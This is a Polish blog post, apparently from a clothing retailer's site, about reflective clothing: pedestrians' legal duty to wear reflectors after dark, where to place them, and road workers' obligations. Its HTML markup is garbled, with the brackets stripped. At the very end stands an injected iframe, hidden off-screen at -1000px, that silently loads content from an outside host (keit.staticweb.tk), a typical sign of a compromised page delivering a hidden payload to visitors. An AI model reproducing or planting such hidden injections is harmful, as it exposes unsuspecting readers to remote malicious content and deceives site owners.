Technologia w pigułce

Odzież odblaskowa – dla kogo?

11 lutego 2016 • Opublikowane przez

Odzież odblaskowa ma wiele zastosowań. Często wozimy ją w bagażnikach samochodów, wkładamy na siebie, idąc poboczem lub jadąc rowerem. Co powinniśmy wiedzieć o odzieży odblaskowej i kiedy należy mieć ją na sobie?

!–more–

nbsp;

strongObowiązek pieszych/strong
div

Od 31 sierpnia 2014 r. prawo nakazuje, aby każdy pieszy, poruszający się po zmierzchu po drodze poza obszarem zabudowanym, miał odblask umieszczony w sposób widoczny dla kierujących. strongZa brak elementu odblaskowego grozi mandat./strong Z myślą o nich powstaje odzież odblaskowa.

/div
W sklepach, zwłaszcza z odzieżą sportową lub specjalistyczną, znaleźć można a href=”http://argos.pl/oferta,21.html”kurtki softshell/a czy spodnie z odblaskami. Elementami odblaskowymi mogą być również przedmioty doczepiane do ubrania — na przykład opaski, kamizelki lub smycze. Ważne jest, by właściwie umieścić odblaski — najlepiej będzie umieścić je na wysokości kolan, dłoni, w okolicy środka klatki piersiowej i pleców. Wówczas mamy pewność, że będą one dobrze widoczne dla innych uczestników ruchu drogowego, w tym dla kierowców, którzy powinni dobrze widzieć pieszych, poruszających się nocą po drogach.

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2016/02/odblaski-11554.jpg”img class=”wp-image-2665 ” src=”http://argos.pl/blog/wp-content/uploads/2016/02/odblaski-11554.jpg” alt=”Źródło: rogozno.pl” width=”741″ height=”577″ //a Źródło: rogozno.pl

Przypomnijmy więc, że po zmroku piesi ubrany w ciemny strój są widziani przez kierującego pojazdem z odległości około 40 metrów. Za to piesi, który włożyli na siebie elementy odblaskowe, stają się widoczni nawet z odległości 150 metrów. Ta odległość pozwala kierowcom odpowiednio wcześnie rozpocząć hamowanie i bezpiecznie ominąć pieszego.

Osoby, które nie chcą wymieniać odzieży, a obawiają się, że koszty elementów odblaskowych nie pozwolą im na kupno ich, możemy uspokoić — są one znikome, zwłaszcza w porównaniu z kosztami leczenia ofiar wypadków, które, nie licząc strat materialnych, są bez wątpienia wyższe i trudniejsze do oszacowania. Zwykły mieniący się w świetle pasek na kurtce może ocalić życie wielu użytkownikom dróg.

nbsp;

strongOdzież ostrzegawcza — kto jeszcze musi ją nosić?/strong

Obowiązek noszenia strongodzieży ostrzegawczej /strongspoczywa nie tylko na uczestnikach ruchu drogowego. Jest to również wymóg stawiany osobom, które zajmują się wykonywaniem wszelkich prac na drodze. Zgodnie z art. 41 strongPrawa o ruchu drogowym/strong osoba wykonująca roboty lub inne czynności na drodze jest obowiązana używać w sposób widoczny dla innych uczestników ruchu elementów odblaskowych, odpowiadających właściwym span id=”akon_nsitsp_2″warunkom/span technicznym. Drogowcy wkładają przeważnie żółte kamizelki ostrzegawcze lub kurtki w tym kolorze, zaopatrzone w odblask!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe